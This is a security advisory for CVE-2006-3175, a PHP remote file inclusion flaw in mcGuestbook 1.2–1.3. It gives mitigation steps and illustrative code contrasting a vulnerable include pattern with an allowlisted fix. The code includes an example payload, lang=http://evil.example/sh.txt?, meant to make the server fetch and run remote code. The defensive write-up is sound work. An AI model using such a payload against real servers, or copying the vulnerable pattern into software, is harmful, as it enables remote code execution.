PT-2006-4070 · Mcguestbook · Myco Guestbook
Reported by Sweet-Devil · Published 2006-06-23 · Updated 2018-10-18
CVE-2006-3175
CVSS v2.0: 7.5 (High)
| Vector | AV:N/AC:L/Au:N/C:P/I:P/A:P |
Name of the Vulnerable Software and Affected Versions
mcGuestbook versions 1.2 through 1.3
Description
PHP remote file inclusion: the affected versions allow remote attackers to execute arbitrary PHP code by supplying a URL in the lang parameter of the scripts admin.php, ecrire.php, and lire.php, which is then passed to an include. The issue may be limited to a race condition during installation or to an improper installation, since a completed installation creates an include file that sets the lang variable and thereby prevents it from being controlled externally.
Recommendations
For mcGuestbook versions 1.2 through 1.3, block web access to admin.php, ecrire.php, and lire.php until a proper fix is applied, and verify that the installation completed (that the generated include file is present) so that the lang variable cannot be set from the request. As defence in depth, disable URL includes in the PHP configuration (allow_url_fopen on PHP releases before 5.2, allow_url_include on later releases); without them the interpreter will not fetch and execute a remote file, which is the primitive this attack depends on.
Exploit
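The following is an added illustration of the include pattern behind this class of bug and of a hardened replacement; it is not mcGuestbook's source, and the function names, the lang/ directory and the language allowlist are assumptions. The optional $installed argument stands in for the value the install-time include file would set, which is why a completed installation closes the hole while an incomplete one leaves lang under request control.

```php
<?php
declare(strict_types=1);

/*
 * Added example, not mcGuestbook code. Contrasts a request-controlled $lang
 * reaching include() with an allowlisted resolver. Names are assumptions.
 */

// Vulnerable pattern: the install step is meant to define $lang in an include
// file; when that file is missing the value falls back to the query string and
// is concatenated straight into the include path. With allow_url_fopen
// (PHP < 5.2) or allow_url_include (PHP >= 5.2) enabled, a value such as
// lang=http://evil.example/sh.txt? makes the interpreter fetch and run remote code.
function resolveLangVulnerable(array $get, ?string $installed = null): string
{
    $lang = $installed ?? ($get['lang'] ?? 'fr');
    return $lang . '.php';          // attacker value: http://evil.example/sh.txt?.php
}

// Hardened pattern: accept only a two-letter code from a fixed allowlist and
// resolve it under a fixed directory, so neither URLs nor ../ traversal survive.
function resolveLangSafe(array $get, string $langDir, array $allowed = ['fr', 'en']): string
{
    $lang = (string)($get['lang'] ?? 'fr');
    if (!preg_match('/^[a-z]{2}$/', $lang) || !in_array($lang, $allowed, true)) {
        $lang = 'fr';               // unknown or malformed code falls back to the default
    }
    return $langDir . '/' . $lang . '.php';
}

// Defence in depth: report whether this interpreter would honour a URL in an
// include at all. On PHP < 5.2 the relevant setting was allow_url_fopen.
function urlIncludesDisabled(): bool
{
    return !filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// Constructed request, as an attacker would send it to lire.php?lang=...
$attacker = ['lang' => 'http://evil.example/sh.txt?'];

// Incomplete install: $installed is null, so the URL reaches the include path.
echo resolveLangVulnerable($attacker), "\n";                 // http://evil.example/sh.txt?.php
// Completed install: the include file's value wins and the request is ignored.
echo resolveLangVulnerable($attacker, 'fr'), "\n";           // fr.php
// Hardened resolver: the URL never matches the allowlist.
echo resolveLangSafe($attacker, __DIR__ . '/lang'), "\n";    // <dir>/lang/fr.php
echo urlIncludesDisabled() ? "URL includes off\n" : "URL includes ON: fix php.ini\n";
```

The allowlist check is the actual fix; the php.ini check only removes the remote-fetch step and would still leave a local file inclusion reachable if the path were built from untrusted input.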
Fix
Weakness Enumeration
Code Injection
Related identifiers
Affected products
Myco Guestbook